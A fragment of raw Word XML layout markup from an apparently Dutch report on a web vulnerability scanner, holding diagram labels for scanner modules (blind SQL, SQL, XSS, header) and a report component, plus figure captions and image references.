                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>234950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="764" name="Text Box 764"/>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966CEA" w14:textId="51B2E981" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00553D99">
                              <w:rPr>
                                <w:b/>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9EAD3" id="Text Box 764" o:spid="_x0000_s1250" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.25pt;margin-top:18.5pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17966CEA" w14:textId="51B2E981" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="00501C35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00553D99">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scanner</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253138944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D78CBA7" wp14:editId="612FD773">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1489710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="1031240"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="769" name="Text Box 769"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635" cy="10312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F0DD7C" w14:textId="689177EC" w:rsidR="00E2204E" w:rsidRPr="00AD2D89" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD2D89">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Module</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>BlindSQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>SQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>XSSModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Header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CBA7" id="Text Box 769" o:spid="_x0000_s1251" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.05pt;margin-top:117.3pt;width:340.05pt;height:8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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FF0DD7C" w14:textId="689177EC" w:rsidR="00E2204E" w:rsidRPr="00AD2D89" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD2D89">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Module</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>BlindSQLModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>SQLModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>XSSModule</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>HeaderModule</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32800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56258B07" wp14:editId="3D437D6F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1022350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="761" name="Rectangle 7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6B149" id="Rectangle 761" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-80.45pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457361A" w14:textId="42A56EFB" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="20C32B62" w14:textId="5EAF0D88" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="2AE8578A" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="2E7300E2" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="0CF596FA" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="44ADA320" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="5457E634" w14:textId="77777777" w:rsidR="00D20E87" w:rsidRDefault="00D20E87"/>
    <w:p w14:paraId="4B274217" w14:textId="2CA8E6A2" w:rsidR="00D20E87" w:rsidRDefault="00AD2D89">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253157376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66A4ABB1" wp14:editId="579C044E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="1488440"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="708" name="Text Box 708"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5715000" cy="14884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228D739" w14:textId="645F7AEB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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4ABB1" id="Text Box 708" o:spid="_x0000_s1252" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8pt;margin-top:23.7pt;width:450pt;height:117.2pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1228D739" w14:textId="645F7AEB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4AD7CF" w14:textId="27AD5835" w:rsidR="007A28D2" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253231104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="401DBE39" wp14:editId="33B08229">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>289560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6169025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="828" name="Text Box 828"/>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46DE3" w14:textId="7D2A6205" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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DBE39" id="Text Box 828" o:spid="_x0000_s1253" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:22.8pt;margin-top:485.75pt;width:80pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D946DE3" w14:textId="7D2A6205" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.22</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005C183E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253139968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E3D97EE" wp14:editId="578C32BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>298450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1600200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4890135" cy="4473575"/>
            <wp:effectExtent l="25400" t="25400" r="37465" b="2222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uild get.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890135" cy="44735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A28D2">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="683A26E4" w14:textId="2A43EB83" w:rsidR="002C79AC" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253232128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AAEBB56" wp14:editId="627C1C08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>292735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7317740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="829" name="Text Box 82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16BBF" w14:textId="401539DC" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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BB56" id="Text Box 829" o:spid="_x0000_s1254" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:23.05pt;margin-top:576.2pt;width:90pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E316BBF" w14:textId="401539DC" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.23</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00787CE7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253142016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B8D9AEA" wp14:editId="2EC47C6C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>304800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5143500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5512435" cy="2054860"/>
            <wp:effectExtent l="25400" t="25400" r="24765" b="2794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get attack 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5512435" cy="2054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87CE7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253140992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CD691A1" wp14:editId="557B4147">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5516245" cy="5140325"/>
            <wp:effectExtent l="25400" t="25400" r="20955" b="1587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et attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5516245" cy="51403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3B7873" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253144064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68D5DA8B" wp14:editId="7A340333">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-911860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="680" name="Rectangle 68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145B" id="Rectangle 680" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-71.75pt;width:25pt;height:1031.7pt;z-index:-2501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gGhp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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002C79AC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA03859" w14:textId="1B18FA54" w:rsidR="00006A7A" w:rsidRDefault="00006A7A">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253149184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3273E1F3" wp14:editId="721EA8AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>803910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>452120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="691" name="Text Box 691"/>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717921" w14:textId="76B221DF" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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E1F3" id="Text Box 691" o:spid="_x0000_s1255" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.3pt;margin-top:35.6pt;width:340pt;height:45.2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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2E717921" w14:textId="76B221DF" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Html2Pdf</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253148160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B716768" wp14:editId="63AC67B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>804545</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>111760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="690" name="Text Box 69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B87060" w14:textId="134A4212" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>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16768" id="Text Box 690" o:spid="_x0000_s1256" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.35pt;margin-top:8.8pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="41B87060" w14:textId="134A4212" w:rsidR="00E2204E" w:rsidRPr="00553D99" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</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46112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46812177" wp14:editId="3B85950E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1031240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="681" name="Rectangle 68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5A9CE" id="Rectangle 681" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-81.15pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E54D9" w14:textId="534A67F8" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="2529CA3F" w14:textId="275442F9" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="4F409C51" w14:textId="284820CA" w:rsidR="00006A7A" w:rsidRDefault="0021244F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253150208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="550DCEBC" wp14:editId="600CCD8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>100330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="358140"/>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4318635" cy="3581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E79A0D" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00D63E8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CEBC" id="Text Box 696" o:spid="_x0000_s1257" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63pt;margin-top:7.9pt;width:340.05pt;height:28.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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18E79A0D" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00CA5627" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9A990" w14:textId="49051967" w:rsidR="00006A7A" w:rsidRDefault="0021244F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253151232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A87DF5D" wp14:editId="374192F3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>802640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>150495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="697" name="Text Box 697"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
